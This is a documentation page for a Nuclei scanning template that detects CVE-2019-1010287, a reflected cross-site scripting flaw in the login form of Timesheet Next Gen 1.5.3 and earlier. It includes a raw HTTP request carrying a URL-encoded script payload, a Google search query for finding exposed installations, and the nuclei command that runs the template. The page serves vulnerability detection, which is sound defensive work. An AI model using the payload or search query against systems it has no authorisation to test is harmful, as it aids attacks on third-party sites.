Timesheet Next Gen <=1.5.3 - Cross-Site Scripting
ID: CVE-2019-1010287
Severity: medium
Author: pikpikcu
Tags: cve,cve2019,timesheet,xss,timesheet_next_gen_project
Description
Section titled “Description”Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a “redirect” parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.
YAML Source
Section titled “YAML Source”id: CVE-2019-1010287
info: name: Timesheet Next Gen <=1.5.3 - Cross-Site Scripting author: pikpikcu severity: medium description: 'Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of Timesheet Next Gen (1.5.4 or above) that properly sanitizes user input to prevent XSS attacks. reference: - http://www.mdh-tz.info/ - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/ - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - https://github.com/merlinepedra25/nuclei-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-1010287 cwe-id: CWE-79 epss-score: 0.00129 epss-percentile: 0.47703 cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: timesheet_next_gen_project product: timesheet_next_gen google-query: inurl:"/timesheet/login.php" tags: cve,cve2019,timesheet,xss,timesheet_next_gen_project
http: - raw: - | POST /timesheet/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login
matchers-condition: and matchers: - type: word part: body words: - '><script>javascript:alert(document.domain)</script>'
- type: status status: - 200# digest: 490a00463044022026991f8ad192e02c394dc83fca3e9e97f65b59e1b3ccc9d148368f6979cad10b022006693e575719779fe2a23cbe01f6f8788670988a6308046ca10f71e30b695838:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-1010287.yaml"